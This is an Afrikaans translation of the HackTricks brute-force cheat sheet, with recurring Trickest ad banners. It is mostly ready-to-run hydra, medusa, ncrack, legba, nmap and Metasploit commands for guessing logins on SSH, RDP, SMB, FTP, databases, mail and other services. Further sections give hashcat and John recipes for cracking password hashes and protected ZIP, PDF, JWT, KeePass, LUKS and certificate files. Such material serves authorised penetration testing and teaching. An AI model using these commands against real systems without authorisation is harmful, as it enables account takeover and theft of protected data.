34 KiB
Brute Force - CheatSheet
Gebruik Trickest om maklik te bou en outomatiese werksvloei te skep wat aangedryf word deur die wêreld se mees gevorderde gemeenskapstools.
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Default Credentials
Soek in google vir standaard geloofsbriewe van die tegnologie wat gebruik word, of probeer hierdie skakels:
- https://github.com/ihebski/DefaultCreds-cheat-sheet
- http://www.phenoelit.org/dpl/dpl.html
- http://www.vulnerabilityassessment.co.uk/passwordsC.htm
- https://192-168-1-1ip.mobi/default-router-passwords-list/
- https://datarecovery.com/rd/default-passwords/
- https://bizuns.com/default-passwords-list
- https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv
- https://github.com/Dormidera/WordList-Compendium
- https://www.cirt.net/passwords
- http://www.passwordsdatabase.com/
- https://many-passwords.github.io/
- https://theinfocentric.com/
Skep jou eie Woordeboeke
Vind soveel inligting oor die teiken as wat jy kan en genereer 'n pasgemaakte woordeboek. Gereedskap wat kan help:
crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst)
@ Lower case alpha characters
, Upper case alpha characters
% Numeric characters
^ Special characters including spac
crunch 6 8 -t ,@@^^%%
cewl example.com -m 5 -w words.txt
Genereer wagwoorde gebaseer op jou kennis van die slagoffer (name, datums...)
python3 cupp.py -h
'n Woordlys generator hulpmiddel, wat jou toelaat om 'n stel woorde te verskaf, wat jou die moontlikheid gee om verskeie variasies van die gegewe woorde te skep, wat 'n unieke en ideale woordlys skep om te gebruik met betrekking tot 'n spesifieke teiken.
python3 wister.py -w jane doe 2022 summer madrid 1998 -c 1 2 3 4 5 -o wordlist.lst
__ _______ _____ _______ ______ _____
\ \ / /_ _|/ ____|__ __| ____| __ \
\ \ /\ / / | | | (___ | | | |__ | |__) |
\ \/ \/ / | | \___ \ | | | __| | _ /
\ /\ / _| |_ ____) | | | | |____| | \ \
\/ \/ |_____|_____/ |_| |______|_| \_\
Version 1.0.3 Cycurity
Generating wordlist...
[########################################] 100%
Generated 67885 lines.
Finished in 0.920s.
- https://github.com/danielmiessler/SecLists
- https://github.com/Dormidera/WordList-Compendium
- https://github.com/kaonashi-passwords/Kaonashi
- https://github.com/google/fuzzing/tree/master/dictionaries
- https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm
- https://weakpass.com/wordlist/
- https://wordlists.assetnote.io/
- https://github.com/fssecur3/fuzzlists
- https://hashkiller.io/listmanager
- https://github.com/Karanxa/Bug-Bounty-Wordlists
Gebruik Trickest om maklik te bou en werkvloei te automate wat aangedryf word deur die wêreld se meest gevorderde gemeenskapstoestelle.
Kry Toegang Vandag:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %}
Georden alfabeties volgens diensnaam.
nmap -p 548 --script afp-brute <IP>
msf> use auxiliary/scanner/afp/afp_login
msf> set BLANK_PASSWORDS true
msf> set USER_AS_PASS true
msf> run
nmap --script ajp-brute -p 8009 <IP>
AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM en Solace)
legba amqp --target localhost:5672 --username admin --password data/passwords.txt [--amql-ssl]
nmap --script cassandra-brute -p 9160 <IP>
# legba ScyllaDB / Apache Casandra
legba scylla --username cassandra --password wordlists/passwords.txt --target localhost:9042
msf> use auxiliary/scanner/couchdb/couchdb_login
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /
Docker Registrasie
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst -s 5000 https-get /v2/
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /
hydra -l root -P passwords.txt [-t 32] <IP> ftp
ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp
legba ftp --username admin --password wordlists/passwords.txt --target localhost:21
HTTP Generiese Brute
HTTP Basiese Auth
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
# Use https-get mode for https
medusa -h <IP> -u <username> -P <passwords.txt> -M http -m DIR:/path/to/auth -T 10
legba http.basic --username admin --password wordlists/passwords.txt --target http://localhost:8888/
legba http.ntlm1 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/
legba http.ntlm2 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/
HTTP - Post Form
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
# Use https-post-form mode for https
Vir https moet jy verander van "http-post-form" na "https-post-form"
HTTP - CMS -- (W)ordpress, (J)oomla of (D)rupal of (M)oodle
cmsmap -f W/J/D/M -u a -p a https://wordpress.com
# Check also https://github.com/evilsocket/legba/wiki/HTTP
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
nmap -sV --script imap-brute -p <PORT> <IP>
legba imap --username user --password data/passwords.txt --target localhost:993
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>
nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>
hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
john jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256
python3 jwt_tool.py -d wordlists.txt <JWT token>
./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 1234567890 8
python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6
nmap --script ldap-brute -p 389 <IP>
legba ldap --target --username admin --password @wordlists/passwords.txt --ldap-domain example.org --single-match
ncrack mqtt:// --user test –P /root/Desktop/pass.txt -v
legba mqtt --target --username admin --password wordlists/passwords.txt
nmap -sV --script mongodb-brute -n -p 27017 <IP>
use auxiliary/scanner/mongodb/mongodb_login
legba mongodb --target localhost:27017 --username root --password data/passwords.txt
legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433
# hydra
hydra -L usernames.txt -P pass.txt <IP> mysql
# msfconsole
msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false
# medusa
medusa -h <IP/Host> -u <username> -P <password_list> <-f | to stop medusa on first success attempt> -t <threads> -M mysql
legba mysql --username root --password wordlists/passwords.txt --target localhost:3306
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
./odat.py passwordguesser -s $SERVER -d $SID
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt
msf> use admin/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORT 1521
msf> set SID <SID>
#msf2, this option uses nmap and it fails sometimes for some reason
msf> use scanner/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORTS 1521
msf> set SID <SID>
#for some reason nmap fails sometimes when executing this script
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>
legba oracle --target localhost:1521 --oracle-database SYSTEM --username admin --password data/passwords.txt
Om oracle_login met patator te gebruik, moet jy installeer:
pip3 install cx_Oracle --upgrade
Offline OracleSQL hash bruteforce (weergawe,,,, en
nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V
# Insecure
legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:110
legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:995 --pop3-ssl
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> postgres
medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgres
ncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP>:5432
patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
use auxiliary/scanner/postgres/postgres_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
legba pgsql --username admin --password wordlists/passwords.txt --target localhost:5432
Jy kan die .deb
pakket aflaai om te installeer vanaf https://http.kali.org/pool/main/t/thc-pptp-bruter/
sudo dpkg -i thc-pptp-bruter*.deb #Install the package
cat rockyou.txt | thc-pptp-bruter –u <Username> <IP>
ncrack -vv --user <User> -P pwds.txt rdp://<IP>
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
legba rdp --target localhost:3389 --username admin --password data/passwords.txt [--rdp-domain <RDP_DOMAIN>] [--rdp-ntlm] [--rdp-admin-mode] [--rdp-auto-logon]
msf> use auxiliary/scanner/redis/redis_login
nmap --script redis-brute -p 6379 <IP>
hydra –P /path/pass.txt redis://<IP>:<PORT> # 6379 is the default
legba redis --target localhost:6379 --username admin --password data/passwords.txt [--redis-ssl]
hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V
hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V
hydra -L <Username_list> rsh://<Victim_IP> -v -V
nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>
hydra -l root -P passwords.txt <IP> rtsp
legba sftp --username admin --password wordlists/passwords.txt --target localhost:22
# Try keys from a folder
legba sftp --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22
msf> use auxiliary/scanner/snmp/snmp_login
nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt <IP>
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp
nmap --script smb-brute -p 445 <IP>
hydra -l Administrator -P words.txt smb -t 1
legba smb --target share.company.com --username admin --password data/passwords.txt [--smb-workgroup <SMB_WORKGROUP>] [--smb-share <SMB_SHARE>]
hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V #Port 587 for SMTP with SSL
legba smtp --username admin@example.com --password wordlists/passwords.txt --target localhost:25 [--smtp-mechanism <mech>]
nmap -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 <IP>
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt
# With alternative address
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt --socks5-address 'internal.company.com' --socks5-port 8080
SQL Server
#Use the NetBIOS name of the machine as domain
crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> mssql
medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mssql
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be careful with the number of passwords in the list, this could block accounts
msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT
hydra -l root -P passwords.txt [-t 32] <IP> ssh
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
patator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
legba ssh --username admin --password wordlists/passwords.txt --target localhost:22
# Try keys from a folder
legba ssh --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22
Swak SSH sleutels / Debian voorspelbare PRNG
Sommige stelsels het bekende gebreke in die willekeurige saad wat gebruik word om kriptografiese materiaal te genereer. Dit kan lei tot 'n dramaties verminderde sleutelspektrum wat met gereedskap soos snowdroppe/ssh-keybrute gebruteforce kan word. Voor-gegenerateerde stelle van swak sleutels is ook beskikbaar soos g0tmi1k/debian-ssh.
STOMP (ActiveMQ, RabbitMQ, HornetQ en OpenMQ)
Die STOMP teksprotokol is 'n wyd gebruikte boodskapprotokol wat naatlose kommunikasie en interaksie met gewilde boodskapkwotasiedienste soos RabbitMQ, ActiveMQ, HornetQ, en OpenMQ toelaat. Dit bied 'n gestandaardiseerde en doeltreffende benadering om boodskappe uit te ruil en verskeie boodskapoperasies uit te voer.
legba stomp --target localhost:61613 --username admin --password data/passwords.txt
hydra -l root -P passwords.txt [-t 32] <IP> telnet
ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet
legba telnet \
--username admin \
--password wordlists/passwords.txt \
--target localhost:23 \
--telnet-user-prompt "login: " \
--telnet-pass-prompt "Password: " \
--telnet-prompt ":~$ " \
--single-match # this option will stop the program when the first valid pair of credentials will be found, can be used with any plugin
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt -s <PORT> <IP> vnc
medusa -h <IP> –u root -P /root/Desktop/pass.txt –M vnc
ncrack -V --user root -P /root/Desktop/pass.txt <IP>:>POR>T
patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!='Authentication failure' --max-retries 0 –x quit:code=0
use auxiliary/scanner/vnc/vnc_login
nmap -p 5900,5901 --script vnc-brute --script-args brute.credfile=wordlist.txt <IP>
legba vnc --target localhost:5901 --password data/passwords.txt
use auxiliary/scanner/vnc/vnc_login
set RHOSTS <ip>
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
Gebruik Trickest om maklik werkvloei te bou en te automate wat deur die wêreld se mees gevorderde gemeenskapstools aangedryf word.
Kry Vandag Toegang:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %}
Aanlyn krakdatabasisse
http://hashtoolkit.com/reverse-hash?(MD5 & SHA1)- https://shuck.sh/get-shucking.php (MSCHAPv2/PPTP-VPN/NetNTLMv1 met/sonder ESS/SSP en met enige uitdaging se waarde)
- https://www.onlinehashcrack.com/ (Hashes, WPA2 vangste, en argiewe MSOffice, ZIP, PDF...)
- https://crackstation.net/ (Hashes)
- https://md5decrypt.net/ (MD5)
- https://gpuhash.me/ (Hashes en lêer hashes)
- https://hashes.org/search.php (Hashes)
- https://www.cmd5.org/ (Hashes)
- https://hashkiller.co.uk/Cracker (MD5, NTLM, SHA1, MySQL5, SHA256, SHA512)
- https://www.md5online.org/md5-decrypt.html (MD5)
- http://reverse-hash-lookup.online-domain-tools.com/
Kyk hierna voordat jy probeer om 'n Hash te brute force.
#sudo apt-get install fcrackzip
fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip
zip2john file.zip > zip.john
john zip.john
hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
.\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack
Bekende platte teks zip aanval
Jy moet die platte teks (of 'n deel van die platte teks) van 'n lêer wat binne die versleutelde zip bevat, weet. Jy kan lêername en grootte van lêers wat binne 'n versleutelde zip bevat, nagaan deur: 7z l encrypted.zip
Laai bkcrack af van die vrylating bladsy.
# You need to create a zip file containing only the file that is inside the encrypted zip
zip plaintext.zip plaintext.file
./bkcrack -C <encrypted.zip> -c <plaintext.file> -P <plaintext.zip> -p <plaintext.file>
# Now wait, this should print a key such as 7b549874 ebc25ec5 7e465e18
# With that key you can create a new zip file with the content of encrypted.zip
# but with a different pass that you set (so you can decrypt it)
./bkcrack -C <encrypted.zip> -k 7b549874 ebc25ec5 7e465e18 -U unlocked.zip new_pwd
unzip unlocked.zip #User new_pwd as password
cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z
#Download and install requirements for 7z2john
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl
apt-get install libcompress-raw-lzma-perl
./7z2john.pl file.7z > 7zhash.john
apt-get install pdfcrack
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
#pdf2john didn't work well, john didn't know which hash type was
# To permanently decrypt the pdf
sudo apt-get install qpdf
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf
PDF Eienaar Wagwoord
Om 'n PDF Eienaar wagwoord te kraak, kyk hier: https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/
git clone https://github.com/Sjord/jwtcrack.git
cd jwtcrack
#Bruteforce using crackjwt.py
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
#Bruteforce using john
python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
john jwt.john #It does not work with Kali-John
NTLM kraking
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot
sudo apt-get install -y kpcli #Install keepass tools like keepass2john
keepass2john file.kdbx > hash #The keepass is only using password
keepass2john -k <file-password> file.kdbx > hash # The keepass is also using a file as a needed credential
#The keepass can use a password and/or a file as credentials, if it is using both you need to provide them to keepass2john
john --wordlist=/usr/share/wordlists/rockyou.txt hash
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
Lucks beeld
Metode 1
Installeer: https://github.com/glv2/bruteforce-luks
bruteforce-luks -f ./list.txt ./backup.img
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt
Metode 2
cryptsetup luksDump backup.img #Check that the payload offset is set to 4096
dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1
hashcat -m 14600 -a 0 luckshash wordlists/rockyou.txt
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt
Nog 'n Luks BF tutoriaal: http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1
#John hash format
PGP/GPG Privaat sleutel
gpg2john private_pgp.key #This will generate the hash and save it in a file
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash
DPAPI Meester Sleutel
Gebruik https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py en dan john
Open Office Wachtwoord Beskermde Kolom
As jy 'n xlsx-lêer het met 'n kolom wat deur 'n wagwoord beskerm word, kan jy dit ontbeskerm:
- Laai dit op na google drive en die wagwoord sal outomaties verwyder word
- Om dit handmatig te verwyder:
unzip file.xlsx
grep -R "sheetProtection" ./*
# Find something like: <sheetProtection algorithmName="SHA-512"
hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg" saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>
# Remove that line and rezip the file
zip -r file.xls .
PFX Sertifikate
# From https://github.com/Ridter/p12tool
./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt
# From https://github.com/crackpkcs12/crackpkcs12
crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx
Gebruik Trickest om maklik werkvloei te bou en te automate wat aangedryf word deur die wêreld se meest gevorderde gemeenskapstools.
Kry Toegang Vandag:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %}
Hash voorbeelde: https://openwall.info/wiki/john/sample-hashes
> <HASH>
Wordlist Generasie Gereedskap
- kwprocessor: Gevorderde sleutelbord-wandelgenerator met konfigureerbare basis karakters, sleutelkaart en roetes.
kwp64.exe basechars\custom.base keymaps\uk.keymap routes\2-to-10-max-3-direction-changes.route -o D:\Tools\keywalk.txt
John mutasie
Lees /etc/john/john.conf en konfigureer dit
john --wordlist=words.txt --rules --stdout > w_mutated.txt
john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules
- Woordlys-aanval (
-a 0
) met reëls
Hashcat kom reeds met 'n map wat reëls bevat maar jy kan ander interessante reëls hier vind.
hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule
- Wordlist combinator aanval
Dit is moontlik om 2 woordlyste in 1 te kombineer met hashcat.
As lys 1 die woord "hello" bevat en die tweede 2 lyne met die woorde "world" en "earth" bevat. Die woorde helloworld
en helloearth
sal gegenereer word.
# This will combine 2 wordlists
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt
# Same attack as before but adding chars in the newly generated words
# In the previous example this will generate:
## hello-world!
## hello-earth!
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt -j $- -k $!
- Mask aanval (
-a 3
# Mask attack with simple mask
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt ?u?l?l?l?l?l?l?l?d
hashcat --help #will show the charsets and are as follows
? | Charset
l | abcdefghijklmnopqrstuvwxyz
d | 0123456789
h | 0123456789abcdef
H | 0123456789ABCDEF
s | !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
a | ?l?u?d?s
b | 0x00 - 0xff
# Mask attack declaring custom charset
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1
## -1 ?d?s defines a custom charset (digits and specials).
## ?u?l?l?l?l?l?l?l?1 is the mask, where "?1" is the custom charset.
# Mask attack with variable password length
## Create a file called masks.hcmask with this content:
## Use it to crack the password
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt .\masks.hcmask
- Woordlys + Masker (
-a 6
) / Masker + Woordlys (-a 7
) aanval
# Mask numbers will be appended to each word in the wordlist
hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d
# Mask numbers will be prepended to each word in the wordlist
hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txt
Hashcat modi
hashcat --example-hashes | grep -B1 -A2 "NTLM"
Kraak van Linux Hashes - /etc/shadow lêer
500 | md5crypt $1$, MD5(Unix) | Operating-Systems
3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems
7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems
1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems
Kraak Windows Hashes
3000 | LM | Operating-Systems
1000 | NTLM | Operating-Systems
Kraak van Algemene Toepassing Hashes
900 | MD4 | Raw Hash
0 | MD5 | Raw Hash
5100 | Half MD5 | Raw Hash
100 | SHA1 | Raw Hash
10800 | SHA-384 | Raw Hash
1400 | SHA-256 | Raw Hash
1700 | SHA-512 | Raw Hash
{% hint style="success" %}
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Gebruik Trickest om maklik te bou en werkvloei te automate wat aangedryf word deur die wêreld se mees gevorderde gemeenskapstoestelle.
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